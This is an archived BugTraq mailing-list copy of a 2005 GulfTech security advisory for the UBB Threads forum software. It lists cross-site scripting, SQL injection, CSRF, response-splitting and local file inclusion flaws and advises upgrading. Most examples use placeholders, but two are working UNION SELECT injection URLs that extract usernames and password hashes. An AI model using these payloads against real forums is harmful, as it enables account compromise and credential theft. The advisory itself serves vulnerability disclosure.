Infopop UBB Threads Multiple Vulnerabilities

To: BugTraq <bugtraq@xxxxxxxxxxxxxxxxx>, Secunia Research <vuln@xxxxxxxxxxx>, OSVDB <moderators@xxxxxxxxx>
Subject: Infopop UBB Threads Multiple Vulnerabilities
From: GulfTech Security Research <security@xxxxxxxxxxxx>
Date: Thu, 23 Jun 2005 23:26:51 -0500
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
User-agent: Mozilla Thunderbird 1.0.2 (Windows/20050317)

##########################################################
# GulfTech Security Research              June 23rd, 2005
##########################################################
# Vendor  : Infopop Corporation
# URL     : http://www.ubbcentral.com/ubbthreads/
# Version : All Versions Prior To 6.5.2 Beta
# Risk    : Multiple Vulnerabilities
##########################################################



Description:
UBB Threads is a very popular forum system developed by Infopop.
There are a number of vulnerabilities in UBB Threads that may allow
an attacker to execute cross site scripting, http response splitting,
and cross site request forgery attacks. Also, an attacker may include,
execute, or read arbitrary local files. These vulnerabilities may allow
for an attacker to completely compromise an installation of UBB Threads
and possibly more. Users are encouraged to upgrade as soon as possible
to the latest UBB Threads release.



Cross Site Scripting:
There are a large number of cross site scripting issues in UBB Threads.
Due to the large number the examples I will simply put a [XSS] where an
attacker might place offending code. Some examples might look like this.

http://ubbt/dosearch.php?Cat=0&Searchpage=2[XSS]&topic=
http://ubbt/newreply.php?Cat=0&Board=UBB8&Number=39818[XSS]&page=0&what=showflat&fpart=1&vc=1
http://ubbt/newreply.php?Cat=0&Board=UBB8&Number=39818&page=0&what=showflat[XSS]&fpart=1&vc=1
http://ubbt/newreply.php?Cat=0&Board=UBB8&Number=39818&page=0[XSS]&what=showflat&fpart=1&vc=1
http://ubbt/showprofile.php?Cat=0&User=7&Number=39818[XSS]&Board=UBB8&what=showflat&page=0&fpart=1&vc=1
http://ubbt/showprofile.php?Cat=0&User=7&Number=39818&Board=UBB8[XSS]&what=showflat&page=0&fpart=1&vc=1
http://ubbt/showprofile.php?Cat=0&User=7&Number=39818&Board=UBB8&what=showflat[XSS]&page=0&fpart=1&vc=1
http://ubbt/showflat.php?Cat=0&Board=UBB5&Number=42173&page=0&fpart=all[XSS]
http://ubbt/showflat.php?Cat=0&Board=UBB5&Number=42173&page=0[XSS]&fpart=all
http://ubbt/showmembers.php?Cat=&like=p[XSS]&sb=1&page=1

These vulnerabilities can be used to steal sensitive information from a
user, and possibly lead to malicious code execution in the context of
the victims browser.



SQL Injection:
There are a number of SQL Injection issues in UBB Threads that allow for

an attacker to influence, or disclose sensitive information in theunderlying

database. Below are some examples.

http://ubbt/download.php?Number=42227[SQL]
http://ubbt/calendar.php?Cat=7&month=6&year=2005[SQL]
http://ubbt/calendar.php?Cat=&month=7[SQL]&year=2005
http://ubbt/modifypost.phpCat=0&Username=foobar&Number=
[SQL]&Board=UBB8&page=0&what=showflat&fpart=&vc=1&Approved=yes&convert=markup
&Subject=Re%3A+Pruning+old+posts&Icon=book.gif&Body=yup&markedit=1&addsig=1&
preview=1&peditdelete=Delete+this+post

The above is just examples, and will not do anything except maybetrigger an errorbut I will provide a few examples of how these vulnerabilities could beexploited.First, there is an SQL Injection issue that occurs when emailing athread to someone


http://ubbt/mailthread.php?Cat=0&Board=UBB2&Number=-99'%20UNION%20SELECT%20U_Username
,U_Password%20FROM%20w3t_Users%20WHERE%20U_Username%20=%20'victim'/*&page=0&vc=1&
fpart=1&what=showflat

Visiting a url like the one above by itself will not cause much tohappen, but ifyou complete the form, you will notice an email arrives at the addressyou specifiedin the form, and the contents of that email are the contents you queriedfrom thedatabase! Also, in the private messaging feature there is anotherserious SQL Injection

issue.

http://ubbt/viewmessage.php?Cat=&message=-99%20UNION%20SELECT%20null,U_Username,U_Password,
0,0%20FROM%20w3t_Users%20WHERE%20U_Username%20=%20'foobar'/*&status=N&box=received

A url like the one above would yield the user 'foobar' s password hashand username.


http://ubbt/addfav.php?Cat=0&Board=UBB2&main=41654[SQL]&type=reminder&Number=41654&page=
0&vc=1&fpart=1&what=showflat
http://ubbt/notifymod.php?Cat=0&Board=UBB5&Number=42173[SQL]&page=0&what=showthreaded
http://ubbt/grabnext.php?Cat=4&Board=UBB23&mode=showflat&sticky=0&dir=old&posted=1045942715[SQL]

Also, there are a few SQL Injection issues that require the post method.For examplewhen rating a profile, or post, or anything else (they all use the samefeature) youcan specify arbitrary SQL statements to the "Main" parameter. Also, whenconducting asearch an attacker may specify arbitrary SQL statements in the "Forum[]"array andhave them execute successfully with the privileges of the current mysqluser.




Cross Site Request Forgery:

There are a number of CSRF issues in UBB Threads, and these issues allowfor an attacker

to unwillingly change their ignore, and address settings.

http://ubbt/addaddress.php?Cat=0&User=123&Board=&Number=&what=showmembers&page=1
http://ubbt/toggleignore.php?Cat=0&User=123&Board=&Number=&what=showmembers&page=1
http://ubbt/removeignore.php?Cat=&User=123
http://ubbt/removeaddress.php?Cat=&User=123

These issues really affect privacy on the forums, and make it nearlyimpossible to keep

away from any harassing members :)


HTTP Response Splitting:

There are several HTTP Response Splitting issues in UBB Threads. Theseissues allowfor an attacker to manipulate headers sent back to the user, and mayallow for codeexecution in the context of the victims browser. The "Cat" parameter inthe files

toggleshow.php, togglecats.php, and showprofile.php are all vulnerable.



Local File Inclusion:

UBB Threads suffers from a local file inclusion vulnerability whenhandling languagepreferences extracted from the cookie. The "language" parameter is neversanitizedand can thus be exploited by specifying an arbitrary file locationappended with a nullbyte (%00). This could lead to code execution, or in most cases, filedisclosure.



Solution:

An updated version of UBB threads has been released to address thepreviously mentioned

issues, and users are strongly advised to upgrade immediately.

http://www.ubbcentral.com/boards/showflat.php/Cat/0/Number/42351/Main/42351/#Post42351

Users can visit the above url to get information regarding UBB Threadssecurity updates.




Related Info:
The original advisory can be found at the following location
http://www.gulftech.org/?node=research&article_id=00084-06232005



Credits:
James Bercegay of the GulfTech Security Research Team

Prev by Date: TSLSA-2005-0030 - multi
Next by Date: Re: [Full-disclosure] Solaris 10 /usr/sbin/traceroute vulnerabilities
Previous by thread: TSLSA-2005-0030 - multi
Next by thread: MDKSA-2005:104 - Updated squid packages fix vulnerability
Index(es):
- Date
- Thread